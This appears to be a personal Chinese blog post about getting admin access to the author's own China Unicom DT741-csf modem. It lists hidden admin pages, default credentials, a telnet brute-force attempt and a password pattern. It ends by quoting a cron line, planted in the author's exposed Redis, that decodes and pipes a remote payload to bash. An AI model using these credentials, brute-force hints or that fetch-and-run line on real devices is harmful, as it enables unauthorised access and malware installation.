最近在整自动追番¹，需要用到 BT 下载，Aria2 似乎没有 UPnP ，所以需要手动设置下虚拟主机，端口转发之类的事情。看了下家里的光猫是联通的 DT741-csf。

在各种搜索和自己研究中，找到了一些破解的方法。

• /hidden_version_switch.html 打开 telnet ，使用 root:Pon521 登陆之后拿配置文件
• /getpage.gch?pid=1002&nextpage=*.gch 可以跳转到一些普通用户看不到的界面
• 使用默认用户名密码 CUAdmin

上面三种方法都不行，telnet 端口虽然打开了，但密码不对。通过 /getpage.gch 最多跳转到 FTP 设置界面，更多设置估计是在后台有做限制了。

我甚至安装了 Kail Linux 准备穷举 telnet 密码，但由于是单线程，太慢了，就放弃了。

后来就是投诉到当地联通宽带，回电说一般情况是不能给用户管理员密码之类的，还要求我做个保证，如果自己玩坏了，不能找联通修。

题外话：装机师傅和联通客服都不知道什么是管理员密码，他们甚至分不清宽带账户、猫的登录、管理员账户和路由器账户。还被师傅教育不要乱搞，别以为自己很聪明 etc…

最后拿到了密码 CUAdmin<随机数字x8> （同 telnet 密码），用户名是 CUAdmin，登陆位置 ip/cu.html，

倒是能给以后的穷举提供思路。我在穷举 telnet 密码时用的是 CUAdmin,cuadmin,admin 作为前缀加数字 0 一直到 10000000。但现在已知组合情况，可以少很多次尝试，虽然还是有 10^8 可能性….. 但至少是在范围内了。

虽然体验不是很好，但是联通给公网 IP 还是很大方的，1 分钟的电话就要到了。

不小心把 Redis 也暴露在公网上了（没有密码），瞬间被塞挖矿/加密之类的脚本的内容到 Redis 里..

*/3 * * * * * <url-b64>|base64 -d|bash|bash